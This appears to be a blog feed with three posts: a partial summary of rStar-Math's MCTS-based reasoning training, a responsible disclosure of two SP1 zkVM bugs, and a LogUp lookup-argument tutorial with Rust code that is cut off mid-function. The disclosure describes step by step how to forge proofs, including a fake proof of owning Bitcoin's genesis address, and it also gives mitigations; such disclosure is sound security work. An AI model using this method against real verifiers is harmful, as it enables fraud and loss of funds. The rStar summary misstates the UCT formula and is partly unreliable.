    * **Process Reward Model Training** : Instead of naïve step-level score annotation, the authors develop a more effective process preference model (PPM). This model evaluates the quality of reasoning steps, guiding the policy SLM to produce better solutions.</span></span>
    * **Self-Evolution Framework** : The policy SLM and PPM are built from scratch and iteratively evolved through multiple rounds. In each round, millions of synthesized solutions for a large set of math problems are generated, progressively enhancing the reasoning capabilities of the models.</span></span></code></pre>
It is important to note that while an LLM can provide a correct answer for a given problem, the reasoning may be flawed or contain invalid steps. Thus, it is essential that the model can learn how to avoid invalid steps along the way. rStar decouples reasoning into a generation-discrimination process. The following section will discuss the techniques used to train and improve the LLM.</p>
Techniques</h2>
rStar’s process involves generating alternative steps and reasoning about them. The main techniques are:</p>
    * **Monte Carlo Tree Search** (MCTS): [MCTS](https://en.wikipedia.org/wiki/Monte_Carlo_tree_search) is used during test-time to explore multiple reasoning paths. The policy SLM generates potential steps, and the PPM evaluates them, guiding the search towards the most promising solutions. MTCS is used because it breaks down problems into single-step generation tasks, yielding step-level training data for the LLM. Besides, this approach is simpler than Best-of-N or self-consistency, which requires generating full solutions at once.</span></span>
    * **Code-Augmented Data Synthesis** : By incorporating code execution into the data synthesis process, the system ensures the generated reasoning steps are verifiable and correct, providing high-quality training data for the policy SLM.</span></span>
    * **Process Preference Modeling (PPM)** : The PPM assesses the quality of intermediate reasoning steps, allowing the system to prefer more logical and accurate paths during the MCTS exploration.</span></span>
    * **Self-Evolution Strategy** : Through iterative training rounds, both the policy SLM and PPM are refined. Each round uses the outputs from the previous iteration to improve performance, enabling the models to develop advanced reasoning capabilities over time.</span></span></code></pre>
MCTS is a decision-making algorithm used in complex domains such as board games (Go, Chess, Shogi), combinatorial optimization, and various planning problems. The key idea of MCTS is to incrementally build a search tree by running many simulated “playouts” (or rollouts) from a given state and using the simulation results to guide which parts of the tree should be explored more deeply. The four steps for MCTS are:</p>
    * **Selection** : Starting at the root node (the current game state), select child nodes down the tree according to a selection policy that balances exploration (trying less-visited moves) and exploitation (focusing on moves that appear promising). The Upper Confidence Bound for Trees (UCT) is a standard selection policy.</span></span>
    * **Expansion** : When you reach a node that is not a terminal state and has unvisited child states (moves), expand one (or more) of those child nodes in the tree.</span></span>
    * **Simulation (Rollout)** : From the expanded node, simulate a random (or semi-random) sequence of moves until reaching a terminal state (i.e., game over or a pre-defined depth for non-terminal states). The outcome of this simulation (win/lose/draw or another reward measure) is recorded.</span></span>
    * **Backpropagation** : Propagate the simulation’s result back up through the visited nodes in the tree, updating statistics (e.g., total reward, visit counts). This information is used to inform the next selection step.</span></span></code></pre>
In this case, the LLM first generates the MCTS with a set of human reasoning actions to build higher quality reasoning trajectories such as:</p>
    * **Propose a one-step thought**.</span></span>
    * **Complete reasoning thought**.</span></span>
    * **Propose subquestions and answer**.</span></span>
    * **Re-answer the subquestion**.</span></span>
    * **Rephrase the question**.</span></span></code></pre>
These are typical actions that we as humans do to solve complex tasks. We rephrase or find related questions that can help us shed new light on the problem.</p>
A second LLM verifies each trajectory proposed by the first one and assesses their validity. If there is an agreement between both, the trajectories can be considered mutually consistent and valid with high likelihood. This resembles working with peers and checking each other’s answers. Since each step contains Python code, only those nodes with successful code execution are kept. These high-quality trajectories will be used as part of the training set.</p>
The authors introduce a method to provide step-by-step verified trajectories with per-step Q-value annotations. They use four rounds of self-evolution: the first two are terminal-guided MCTS (since the PPM still has not been trained), while the next two rely on the trained PPM. Starting from the tree’s root (the original query), the LLM generates different alternative steps and annotates each with a Q-value. The process proceeds until the LLM reaches a solution corresponding to a tree leaf, $s_d$. Each $s_d$ contains a sequence of steps linking it to the root, corresponding to a single trajectory. Initially, all Q-values are set to $0$. We generate each new level of the tree until we get to the first leaf (terminal node) and reward it according to whether it got to the correct answer. Then, this score is backpropagated to all the steps in the trajectory, according to $Q(s_k ) = Q(s_k ) + Q(s_d )$. As we get more valid trajectories going through a node, the higher its $Q$ value. Finally, the LLM takes $n$ high-quality of these trajectories to use as training data.</p>
Upper Confidence Bound for Trees (UCT) balances exploration and exploitation. For a node $k$, its UCT value is computed as

$$UCT(k) = \frac{W_k }{N_k} + c \sqrt{\frac{\ln (N_p )}{\ln (N_k )}}$$</p>
where $W_k$ is the total reward of node $k$, $N_k$ is the number of times node $k$ has been visited, $N_p$ is the number of times the parent node of $k$ has been visited and $c$ is a constant. A higher value of $c$ favors exploration. The first term focuses on the reward of the node (exploitation), while the second one encourages exploration by penalizing nodes with high visit counts relative to its parent. The reward will first be given from the terminal and later by the PPM. The authors introduce a novel training method based on positive-negative preference pairs.</p>
Since SLM have weaker capabilities, the authors used four rounds of MCTS deep thinking to generate progressively higher quality data and extend the training set with more challenging problems:</p>
    * **Round 1** : Bootstrapping an initial strong policy model, SML-r1. This uses terminal annotated Q-values and performs 8 MCTS rollouts for efficiency. The data obtained is used to train PPM-r1.</span></span>
    * **Round 2** : Training a reliable PPM PPM-r2. Using PPM-r1, the authors conduct lots of MCTS with 16 rollouts per problem.</span></span>
    * **Round 3** : PPM-augmented MCTS for improved data quality. Using PPM-r2, the model tackles more complex problems and generates additional data to train PPM-r3.</span></span>
    * **Round 4** : Solving more challenging problems. For unsolved problems, the authors increase the number of rollouts to 64 or 128 and produce different MCTS with various initial seeds. This step boosts the success rate of the math model.</span></span></code></pre>Results</h2>
After four rounds of self-evolution, rStar-Math significantly improved the math reasoning abilities of SLMs. For instance, on the MATH benchmark, it enhanced Qwen2.5-Math-7B’s performance from 58.8% to 90.0% and Phi3-mini-3.8B’s from 41.4% to 86.4%, surpassing OpenAI’s o1-preview model. Additionally, on the USA Math Olympiad (AIME), rStar-Math solved an average of 53.3% of problems, ranking among the top 20% of high school math students. The following graphs compare the performance of rStar-math in different benchmarks with other LLMs based on the number of rollouts.</p>
</p>
Summary</h2>
LLMs have shown great capabilities in understanding human language, image generation, and developing agents to perform various tasks. While their performance and accuracy have increased, this has been at the cost of a larger number of parameters, increasing training and inference costs and making it impossible for users to run them locally or fine-tune them to perform a particular task. Another important point is that LLMs can hallucinate, providing invalid answers or giving the right answer with flawed reasoning. This work explores how to use deep thinking with smaller LLM to improve performance, which could enable users to run the model locally or even fine-tune it. Using Monte Carlo Tree Search, scoring strategies based on Go engines, and code-augmented data, rStar-math achieves performance similar to that of much larger LLMs. In summary, rStar-Math demonstrates that with innovative training and reasoning strategies, small language models can achieve state-of-the-art performance in mathematical reasoning tasks, rivaling or surpassing larger models.</p>


Responsible  disclosure of an exploit in Succinct's SP1 zkVM, found in partnership with 3MI Labs and Aligned, which arises from the interaction of two distinct security vulnerabilities.
Unknown — Sun, 26 Jan 2025 00:00:00 +0000
TL;DR</strong> : We found two security bugs that can be combined to perform an exploit in Succinct’s SP1 zkVM, which allows you to generate false proofs. In severe cases, this could lead to loss of funds. This was found thanks to a collaboration between the top notch research 3MI Labs</a>, Aligned</a>, and LambdaClass</a>. This is a different security bug from the one we informed previously in our blog</a> and it highlights the importance of having multiple teams paying attention to security and working towards having simpler codebases. For a PoC of the exploit, see the following repo</a></p>
LambdaClass and Fuzzing Labs will invest in further investigating critical security bugs in zkVMs. We believe that codebases have become too complex and over-engineered and this gives rise to lots of bugs. We think that the industry is at risk if we do not invest, add more eyes and simplify codebases. The industry has become complacent when it comes to security and is being pushed by business decisions to rush into production use, leaving aside these security issues, which could lead to very serious consequences. In this post, we analyze the case of SP1, but we think that all zkVM’s codebases need to be simplified and follow the standards, lowering the attack surface. As mentioned, we will conduct a more thourough research on different zkVMs.</p>
Introduction</h2>
We have seen in several engineering projects the development of long and complex codebases, with too many fearures and poor documentation and testing. Some people believe that having such codebases shows that you are smart, have excellent coding skills and given a lot of thought on everything. We think it otherwise: the proof of mastery lies in simplicity. Bugs will always happen in any project, but the chance of having critical bugs increases with codebase complexity and length in a nonlinear way: the longer and more complex, the more bugs and hard to predict behaviors you can have. During our analysis of zk virtual machines and proof systems, we found two security bugs that can be combined to produce an exploit allowing a malicious party to prove false statements. Basically, you could generate false proofs for programs and modify some public inputs, which, in a world were computation is to be verified on chain using this technology, could lead to several exploits and loss of funds.</p>
From our point of view, these exploits arise from the complexity of the codebase, having many files with different constraints and the addition of several features and optimizations that bloat the codebase. We also believe that business decisions are trying to rush these systems into production, when we should still focus on improving their security and auditability. We think that more care needs to be taken when designing, developing and testing zk virtual machines that could be used in real world applications, especially when funds are at risk.</p>
Description of the exploits</h2>
Two bugs were identified in the sp1-sdk</code></a> crate at version 3.4.0, the most recently published version at the time we started our analysis. We were able to exploit them to generate valid SP1 proofs of incorrect execution of an arbitrary program, which results in universal forgeries of proofs for arbitrary statements, even incorrect ones.</p>
Bug Descriptions</h2>
This report describes two bugs:</p>
    * SP1-2.1: Unconstrained `committed_value_digest` without `COMMIT` syscalls</span></span>
    * SP1-2.2: Unchecked `next_pc` Condition in First Layer of Recursion Tree</span></span></code></pre>SP1-2.1: Unconstrained committed_value_digest</code> without COMMIT</code> syscalls</h3>
When an SP1 executor executes a guest program, the COMMIT</code> syscalls(0x00_00_00_10</code>) resulting from calls to sp1_zkvm::io::commit()</code> are delayed to the end of the execution and emitted only when the main</code> function returns</em>.

Since these syscalls are the only events that generate constraints on the committed_value_digest</code> of the ExecutionRecord</code>, this implies that if the execution of the program is halted before the return point of main()</code>, then the COMMIT</code> syscalls are never issued. As a result, the committed_value_digest</code> remains initialised to the all-zero value and is not constrained during proof generation.</p>
This absence of constraints on the digest of committed values during the execution of the program raises further questions on the compatibility of the verifier code of sp1-sdk</code> with proofs of “arbitrary” program, but exploring this falls outside of the scope of this report.</p>
SP1-2.2: Unchecked next_pc</code> Condition in First Layer of Recursion Tree</h3>
In the verifying code for the first layer of the recursion tree, the condition next_pc == 0</code> is not checked if a shard is indicated as containing a “complete” execution. However, this check is present in other recursion constraints (e.g., two-to-one proof compression, field-switch wrapping, proof-system switching).</p>
Other checks exist that are performed on other code paths when is_complete</code> is asserted but are missing from the first layer of the recursion tree; these may be critical to proof soundness, but were not used in our exploit. These can be found in sp1_recursion_circuit::machine::complete::assert_complete</code> (for the recursive constraints) and sp1_prover::verify::verify</code> (for the plain, uncompressed verification). These checks include whether:</p>
    * at least one execution shard is present</span></span>
    * (execution) shard numbering is consecutive, and starts at one,</span></span>
    * the leaf challenger and the final reconstruct challenger match</span></span>
    * the deferred proof digests are consistent, and</span></span>
    * the cumulative sum is consistent.</span></span></code></pre>Exploit Description</h2>
Initially, an attempt to exploit SP1-2.1 was made by making an explicit HALT</code> (0x00_00_00_00</code>) syscall within main()</code>.

While this is not the methodology that was ultimately used, we note that making such explicit HALT</code> syscalls within main might reasonably be passed off as an optimization within the guest program, e.g., by arguing that an early halt within main is a way to shorten a program’s execution trace and therefore reduce its proof computation time. This would seem innocent enough, but SP1-2.1 would then imply that the digest of public values produced before the syscall would remain unconstrained.</p>
However, it suffices to instead create a malicious SP1 executor which stops executing the guest program at an arbitrary pc</code> value. As long as the chosen pc</code> value happens before the return point of main()</code>, no COMMIT</code> syscall will have been produced by the virtual machine. In the exploit presented here, the proof forgery was produced by stopping execution as soon as the program reached the start of the main</code> function.</p>
Before returning the resulting ExecutionRecord</code>, the malicious executor is then free to replace the committed_value_digest</code> of the public_values: PublicValues</code> field with the digest of an arbitrary value. This makes it seem as if the guest program had committed to it during its execution.</p>
Then, an honest CoreProver</code> (sp1_prover::components::SP1ProverComponents::CoreProver</code>) is run to generate an SP1CoreProof</code> (sp1_prover::types::SP1CoreProof</code>) with the maliciously crafted ExecutionRecord</code>. Since there are no COMMIT</code> syscalls contained within the record, the altered committed_value_digest</code>, which does not match the digest of the values committed to by the program, does not cause the proof generation to fail. The CoreProver</code> therefore successfully creates an SP1CoreProof</code> containing two shards s1</code> and s2</code>.</p>
Finally, a malicious SP1Prover</code> (sp1_prover::SP1Prover</code>) is created with the following two modifications:</p>
    1. The second shard `s2` of the `SP1CoreProof` is discarded.</span></span>
    2. The `is_complete` flag is set to `true` in the `SP1RecursionWitnessValues` created from the remaining first shard `s1`. This recursion witness is then used when generating the recursion program for compressing the `SP1CoreProof` with a `CompressProver`.</span></span></code></pre>
Because the malicious executor stopped the guest program with a next_pc</code> value pointing to the start of main, the first shard s1</code> has a non-zero next_pc</code> value. However, since the is_complete</code> flag is true</code>, SP1-2.2 implies that the CompressProver</code> does not constrain the equality next_pc ==0</code>, resulting in an SP1ReduceProof</code> proof generated without errors. When de-serialized by an honest prover and submitted for verification, this SP1ReduceProof</code> then passes honest</em> verification for the guest program.</p>
Exploit demonstration</h3>
We accompanied the bug report with two artefacts that demonstrate how the two bugs can be exploited to provide valid proofs of invalid execution of arbitrary programs. See the repo for the code</a>.</p>
The is-prime directory contains the source files and compiled ELF version of a program(./is-prime/program</code>) which checks primality of a number read from sp1_zkvm::io</code>, together with a script(./is-prime/script</code>) which demonstrates that 42-is-prime.proof</code>(./is-prime/script/42-is-prime.proof</code>) is a valid proof that executing the program results in 42 being verified as a prime number.</p>
The i-am-satoshi(./i-am-satoshi/</code>) directory contains a example of the transferability of this technique. Here, the guest program uses the independent bitcoin</code> crate to compute the Bitcoin address corresponding to the secret key given as input, and then commits to the resulting address with sp1_zkvm::io::commit()</code>. Running the corresponding verifier program</code>(./i-am-satoshi/script/src/main.rs</code>) reveals that the proof demonstrates knowledge of the secret key behind the “genesis Satoshi address” 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa</code>.</p>
This proof of concept illustrates arbitrary statement proving for the SP1 verifier, by verifying knowledge of the secret key to the reward address in the bitcoin genesis block. To perform these exploits, the prover client needs to be modified locally.</p>
Consequences and Limitations</h2>
While the first program presented in this exploit is innocent enough (42 is obviously not prime), the second one exemplifies more serious consequences.

Proof of ownership of any address on any blockchain can be forged and would be accepted by a naïve verifier. We draw the attention to the fact that the program itself was not modified</em>. All of the modifications to create the proof forgery were performed locally to the proving client</strong> which implies that this forgery methodology is generalizable to arbitrary guest programs.</p>
We note that SP1-2.2 is a bug that is restricted to the first layer of the recursion tree, and that subsequent recursive proving of the proof would fail, because the ShrinkProver</code> properly constrains the next_pc == 0</code> check when is_complete == true</code>.

Nonetheless, the honest verifier code(./is-prime/script/src/bin/verifier.rs</code>) is agnostic</em> to the kind of proof that it deserializes which implies that the malicious prover is not forced to further reduce or wrap the forged proof before submitting it for verification to a system that runs the Rust verifier from the sp1-sdk</code> crate.</p>
Possible Mitigations</h2>
Mitigating SP1-2.1</h3>
Mitigating SP1-2.1 requires making sure that the committed_value_digest</code> is constrained within the proof system, even if no COMMIT</code> syscalls are made.</p>
Any implementation of this mitigation would conflict with the current implementation which assumes that committed_value_digest</code> is written to only once. A concrete proposal requires further exploration of the possibilities which is outside of the scope of this report.</p>
Mitigating SP1-2.2</h3>
Ultimately, the code for the recursion program should be patched so that the next_pc == 0</code> constraint (and the other related constraints for complete programs) is applied by the CompressProver</code> in the first layer of the recursion tree, just like it is in the other recursion programs.</p>
As a hot fix which would not be a breaking change to currently accepted verification keys, since the next_pc</code> value is accessible as part of a proof’s

public values, the Rust code of the verifier should check that it is 0</code>, even if this isn’t constrained within the proof system. This hot fix would further enable existing verifiers to check whether this bug was triggered by proofs that are still in storage.</p>
Summary</h2>
Together with 3MI Labs and Aligned, we found two security bugs in Succinct’s SP1 zkVM, and showed how to use them to perform an exploit to generate false proofs that an honest verifier would accept. Since these exploits do not require to change the code of the program and are done locally, they could be used without naïve verifiers even suspecting it is a malicious proof. We think that the complexity and length of the codebase, as well as unclear documentation contribute to the proliferation of bugs, and that we should be working harder on simplifying the codebases and on security, instead of rushing into production due to business concerns, especially when funds could be at risk.</p>


LogUp lookup argument and its implementation using Lambdaworks for continuous read-only memory
Unknown — Fri, 27 Dec 2024 00:00:00 +0000
Introduction</h2>
In a previous post</a>, we explained how to define constraints for a continuous read-only memory</strong> , presenting it as an example to understand how constraints are defined in general. This time, we will continue digging into this example to introduce the LogUp</a> construction, adapted to univariate polynomials, and explain how we implemented it.</p>
In what follows, we will assume that you have a notion of the concepts of constraints, a continuous read-only memory, and an idea of how they are implemented. To go deeper into these topics, we recommend reading the previously mentioned post, as this one will be its continuation.</p>
What is LogUp?</h2>
LogUp is a case of a Lookup Argument</strong>. But what exactly are lookup arguments? They serve as a tool that allows us to prove efficiently that a specific value $v$ belongs to a table of values $T$ without revealing the entire table. This concept is handy for improving the efficiency of arguments for statements that are otherwise quite expensive to arithmetize.</p>
In essence, a lookup argument enables the prover to convince the verifier that every element of a given set $A$ (often represented as a column of a trace table) is contained within another set $T$ (the lookup table). In this way, instead of having to arithmetize many constraints to ensure that $A$ satisfies certain conditions and is in a certain way, we precompute all the valid values that $A$ can have, write them in the table $T$ and then use a lookup argument to prove that all the elements of $A$ belong to $T$ (i.e., they are valid elements). In other words, we achieve to verify the relationship between data while preserving privacy or optimizing computation.</p>
An example of a Lookup argument can be found in the post mentioned above</a>. Let’s quickly check what we did there: given two columns, $a$ (addresses) and $v$ (values), we needed to create their corresponding sorted columns $a’$ and $v’$. We used a Lookup argument known as Grand Product</strong> to prove that they were permutations of the original ones.

Using two random elements $z$ and $\alpha$, sampled from an extension of $\mathbb{F}$, we constructed an auxiliary column $p$ using:</p>
$$p_{i + 1} = p_i \cdot \frac {z - (a_{i + 1} + \alpha v_{i + 1})} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})},$$</p>
The goal was to verify that the last element of this column equals one:</p>
$$p_{n - 1} = \prod_{i = 0}^{n - 1} \frac {z - (a_i + \alpha v_i)} {z - (a^\prime_i + \alpha v^\prime_i)} = 1.$$</p>
This guarantees that $a’$ and $v’$ are permutations of $a$ and $v$, ensuring the correctness of the table.</p>
The idea behind LogUp</strong> is to replace these products with their logarithmic derivatives</strong> , or more simply, to transform the product into a sum of fractions. This approach reduces the computational effort for both the prover and the verifier. The method gets its name because the logarithmic derivative converts products like $\prod_{i = 1}^n X - y_i$ into sums:</p>
$$\sum_{i = 1}^n \frac{1}{X - y_i}.$$</p>
So, suppose we have a column $a = (a_0, \ldots, a_n)$ from the main trace containing repeated elements and a column $t = (t_0, \ldots, t_m)$ from the lookup table without duplicates, and we want to demonstrate that all the elements of $a$ belong to $t$. In that case, it is enough to prove the equality:</p>
$$\sum_{i = 0}^n \frac{1}{\alpha - a_i} = \sum_{i = 0}^m \frac{m_i}{\alpha - t_i}$$</p>
where $\alpha$ is a random element, and $m_i$ is the multiplicity of $t_i$ in $a$, that is, the number of times $t_i$ appears in $a$.</p>
A natural question might arise at this point: is it still more efficient to replace products with sums, mainly since doing so introduces fractions? We won’t work directly with these fractions, as we’ll see later. Instead, we’ll multiply both sides of the equation by the common denominator.</p>
Continuous read-only memory example</h2>
To understand how the constraints of a LogUp argument are written, let’s go back to our example of a continuous read-only memory. To follow this example, we recommend accompanying it with the corresponding implementation made in Lambdaworks</a>.</p>
Main Trace</h3>
First of all, we need to understand how the columns of the main trace are defined in the case of wanting to use a LogUp argument. We will proceed similarly to what we did in the first post. Given the address column $a$ and the value column $v$ of our memory, we will add three additional columns to the main trace: $a’,$ $v’$, and $m$. The $a’$ and $v’$ columns will contain the same values as $a$ and $v$ but will be sorted in ascending order without duplicating values. The column $m$ will represent the multiplicity of these values in the original columns. Since these columns do not have duplicates, they will be smaller. To ensure all columns have the same length and fit into a single table, we will pad $a’$ and $v’$ by repeating their last value and assigning a multiplicity of $0$ to these padded rows in the $m$ column.</p>
Let’s see an example. If our original table was:</p>
$a$</th> $v$</th></tr></thead>

3</td> 30</td></tr>
2</td> 20</td></tr>
2</td> 40</td></tr>
3</td> 30</td></tr>
1</td> 10</td></tr>
3</td> 30</td></tr>
</tbody></table>
The main trace would become:</p>
$a$</th> $v$</th> $a’$</th> $v’$</th> $m$</th></tr></thead>

3</td> 30</td> 1</td> 10</td> 2</td></tr>
2</td> 20</td> 2</td> 20</td> 1</td></tr>
2</td> 40</td> 2</td> 40</td> 1</td></tr>
3</td> 30</td> 3</td> 30</td> 2</td></tr>
1</td> 10</td> 3</td> 30</td> 0</td></tr>
1</td> 10</td> 3</td> 30</td> 0</td></tr>
</tbody></table>
Notice that the original table does not represent a valid read-only memory (since address 2 has two different values, 20 and 40), we can still construct the main trace. Later, the SingleValueConstraint</code> transition constraint will ensure that such tables are invalid.</p>
In our implementation, the function read_only_logup_trace()</code> handles the construction of the main trace. It returns a TraceTable</code> containing the five main columns described above and an auxiliary column initially filled with zeros, which will later be replaced with the appropriate values.</p>
/// Return a trace table with an auxiliary column full of zeros (that will be then replaced with the correct values by the air) and</span></span>
/// and the following five main columns: </span></span>
/// The original addresses and values, the sorted addresses and values without duplicates, and</span></span>
/// the multiplicities of each sorted address and value in the original ones (i.e., how many times they appear in the original address and value columns).</span></span>
pub fn read_only_logup_trace<</span></span>
    F: IsPrimeField + IsFFTField + IsSubFieldOf<E> + Send + Sync,</span></span>
    E: IsField + Send + Sync,</span></span>
>(</span></span>
    addresses: Vec<FieldElement<F>>,</span></span>
    values: Vec<FieldElement<F>>,</span></span>
) -> TraceTable<F, E> {</span></span>
    // We order the addresses and values.</span></span>
    let mut address_value_pairs: Vec<_> = addresses.iter().zip(values.iter()).collect();</span></span>
    address_value_pairs.sort_by_key(|(addr, _)| addr.representative());</span></span>
    </span></span>
    //We define the main columns that will be added to the original ones </span></span>
    let mut multiplicities = Vec::new();</span></span>
    let mut sorted_addresses = Vec::new();</span></span>
    let mut sorted_values = Vec::new();</span></span>
</span>
    for (key, group) in &address_value_pairs.into_iter().group_by(|&(a, v)| (a, v)) {</span></span>
        let group_vec: Vec<_> = group.collect();</span></span>
        multiplicities.push(FieldElement::<F>::from(group_vec.len() as u64));</span></span>
        sorted_addresses.push(key.0.clone());</span></span>
        sorted_values.push(key.1.clone());</span></span>
    }</span></span>
</span>
    // We resize the sorted addresses and values with the last value of each one so they have the</span></span>
    // same number of rows as the original addresses and values. However, their multiplicity should be zero.</span></span>
    sorted_addresses.resize(addresses.len(), sorted_addresses.last().unwrap().clone());</span></span>
    sorted_values.resize(addresses.len(), sorted_values.last().unwrap().clone());</span></span>
    multiplicities.resize(addresses.len(), FieldElement::<F>::zero());</span></span>
</span>
    let main_columns = vec![</span></span>
        addresses.clone(),</span></span>
        values.clone(),</span></span>
        sorted_addresses,</span></span>
        sorted_values,</span></span>
        multiplicities,</span></span>
    ];</span></span>
</span>
    // We create a vector of the same length as the main columns full with zeros from de field extension and place it as the auxiliary column.</span></span>
    let zero_vec = vec![FieldElement::<E>::zero(); main_columns[0].len()];</span></span>
    TraceTable::from_columns(main_columns, vec![zero_vec], 1)</span></span>
}</span></span></code></pre>Auxiliary Trace</h3>
Now, let’s see how to construct the auxiliary column. The auxiliary column, which we’ll call $s$, should accumulate the sums of the fractions corresponding to each row of the main table as follows:</p>
$$ \begin{align} s_0 &= \frac {m_0} {z - (a^\prime_0 + \alpha v^\prime_0)} - \frac {1} {z - (a_0 + \alpha v_0)},

\ \newline

s_1 &= s_0 + \frac { m_1 } {z - (a^\prime_1 + \alpha v^\prime_1)} - \frac {1} {z - (a_1 + \alpha v_1)} \end{align}$$</p>
And so on, obtaining:</p>
$$s_{i + 1} = s_i + \frac {m_{i + 1}} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})} - \frac {1} {z - (a_{i + 1} + \alpha v_{i + 1})} \text{ with } i \in {0, \ldots, n - 2}.$$</p>
As an example, if our main trace was:</p>
$a$</th> $v$</th> $a’$</th> $v’$</th> $m$</th></tr></thead>

3</td> 30</td> 1</td> 10</td> 1</td></tr>
1</td> 10</td> 2</td> 20</td> 2</td></tr>
2</td> 20</td> 3</td> 30</td> 1</td></tr>
2</td> 20</td> 3</td> 30</td> 0</td></tr>
</tbody></table>
Then, our auxiliary column trace $s$ would look like this:</p>
$a$</th> $v$</th> $a’$</th> $v’$</th> $m$</th> $s$</th></tr></thead>

3</td> 30</td> 1</td> 10</td> 1</td> $\frac {1} {z - (1 + \alpha 10)} - \frac {1} {z - (3 + \alpha 30)}$</td></tr>
1</td> 10</td> 2</td> 20</td> 2</td> $s_0 + \frac {2} {z - (2 + \alpha 20)} - \frac {1} {z - (1 + \alpha 10)}$</td></tr>
2</td> 20</td> 3</td> 30</td> 1</td> $s_1 + \frac {1} {z - (3 + \alpha 30)} - \frac {1} {z - (2 + \alpha 20)}$</td></tr>
2</td> 20</td> 3</td> 30</td> 0</td> $s_2 + \frac {0} {z - (3 + \alpha 30)} - \frac {1} {z - (2 + \alpha 20)}$</td></tr>
</tbody></table>
Observe that if the main trace indeed represents a permutation with multiplicities, then the last element of $s$ (that is $s_{n - 1}$) should reflect the accumulation of all sums, canceling each other out and resulting in $0$ (i.e. $s_{n - 1} = 0$). This is analogous to what happens with the Grand Product, where we verify that the final product cancels out and results in 1 (i.e. $p_{n - 1} = 1$). Let’s see this in the context of the example from the table above:</p>
$$ \begin{align}

s_{n - 1} &= {\style{color: orange} {\frac {1} {z - (1 + \alpha 10)}}} - \style{color: cyan} {\frac {1} {z - (3 + \alpha 30)}}

\newline

&+ \style{color: magenta} {\frac {2} {z - (2 + \alpha 20)}} - {\style{color: orange} {\frac {1} {z - (1 + \alpha 10)}}}

\newline

&+ \style{color: cyan} {\frac {1} {z - (3 + \alpha 30)}} - \style{color: magenta} {\frac {1} {z - (2 + \alpha 20)}}

\newline

&+ \frac {0} {z - (3 + \alpha 30)} - \style{color: magenta} {\frac {1} {z - (2 + \alpha 20)}}

\ \newline

&= 0

\end{align}

$$</p>
Now, let’s see how this is implemented in our code. In Lambdaworks, the construction of the auxiliary trace is handled within the AIR implementation. Specifically, in the implementation of LogReadOnlyRAP</code>, you can find the following function build_auxiliary_trace()</code>:</p>
fn build_auxiliary_trace(</span></span>
    &self,</span></span>
    trace: &mut TraceTable<Self::Field, Self::FieldExtension>,</span></span>
    challenges: &[FieldElement<E>],</span></span>
) where</span></span>
    Self::FieldExtension: IsFFTField,</span></span>
{</span></span>
    // Main table</span></span>
    let main_segment_cols = trace.columns_main();</span></span>
    let a = &main_segment_cols[0];</span></span>
    let v = &main_segment_cols[1];</span></span>
    let a_sorted = &main_segment_cols[2];</span></span>
    let v_sorted = &main_segment_cols[3];</span></span>
    let m = &main_segment_cols[4];</span></span>
</span>
    // Challenges</span></span>
    let z = &challenges[0];</span></span>
    let alpha = &challenges[1];</span></span>
</span>
    let trace_len = trace.num_rows();</span></span>
    let mut aux_col = Vec::new();</span></span>
</span>
    // s_0 = m_0/(z - (a'_0 + α * v'_0) - 1/(z - (a_0 + α * v_0)</span></span>
    let unsorted_term = (-(&a[0] + &v[0] * alpha) + z).inv().unwrap();</span></span>
    let sorted_term = (-(&a_sorted[0] + &v_sorted[0] * alpha) + z).inv().unwrap();</span></span>
    aux_col.push(&m[0] * sorted_term - unsorted_term);</span></span>
</span>
    // Apply the same equation given in the permutation transition constraint to the rest of the trace.</span></span>
    // s_{i+1} = s_i + m_{i+1}/(z - (a'_{i+1} + α * v'_{i+1}) - 1/(z - (a_{i+1} + α * v_{i+1})</span></span>
    for i in 0..trace_len - 1 {</span></span>
        let unsorted_term = (-(&a[i + 1] + &v[i + 1] * alpha) + z).inv().unwrap();</span></span>
        let sorted_term = (-(&a_sorted[i + 1] + &v_sorted[i + 1] * alpha) + z)</span></span>
            .inv()</span></span>
            .unwrap();</span></span>
        aux_col.push(&aux_col[i] + &m[i + 1] * sorted_term - unsorted_term);</span></span>
    }</span></span>
</span>
    for (i, aux_elem) in aux_col.iter().enumerate().take(trace.num_rows()) {</span></span>
        trace.set_aux(i, 0, aux_elem.clone())</span></span>
    }</span></span>
}</span></span></code></pre>Transition constraints</h3>
Now, let’s look at how we should define the transition constraints for a continuous read-only memory using LogUp. The first two transition constraints explained in the previous post remain unchanged. That is, we don’t need to make any modifications to ContinuityConstraint</code> and SingleValueConstraint</code>, as the method for verifying that the memory is read-only and continuous using the $a’$ and $v’$ columns remains the same.</p>
However, modifying the third constraint, called PermutationConstraint</code> is essential. This constraint ensures that the auxiliary column $s$ is constructed correctly. It must be checked that $s_i$ satisfies the equation mentioned before:</p>
$$s_{i+1} = s_i + \frac {m_{i+1}} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})} - \frac {1} {z - (a_{i+1} + \alpha v_{i+1})} \text{ with } i \in {0, \ldots, n - 2}.$$</p>
Since constraints must be expressed without division, we will multiply both sides of the equality by the common denominator. This transforms the constraint into the following form:</p>
$$\begin{align}s_{i+1} &\cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1})) =

\ \newline

&=s_i \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))

\ \newline

&+ m_{i+1} \cdot (z - (a_{i+1} + \alpha v_{i+1}))

\ \newline

&- (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1}))

\end{align}$$</p>
Additionally, we will move the left-hand side of the equality to the right, subtracting it so that it can be interpreted as a polynomial in the variables $s$, $a$, $a’$, $v$ and $v’$ that is equal to zero:</p>
$$\begin{align} 0 &=s_i \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))

\ \newline

&+ m_{i+1} \cdot (z - (a_{i+1} + \alpha v_{i+1}))

\ \newline

&- (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1}))

\ \newline

&- s_{i+1} \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))

\end{align}$$</p>
This equation can be found inside the function evaluate()</code> in the implementation of PermutationConstraint</code>. It is worth mentioning that both the prover and verifier must evaluate the polynomial constraint in the same way. However, we are forced to separate this evaluation into two cases because the frames</code> used by each one are of different types.</p>
fn evaluate(</span></span>
    &self,</span></span>
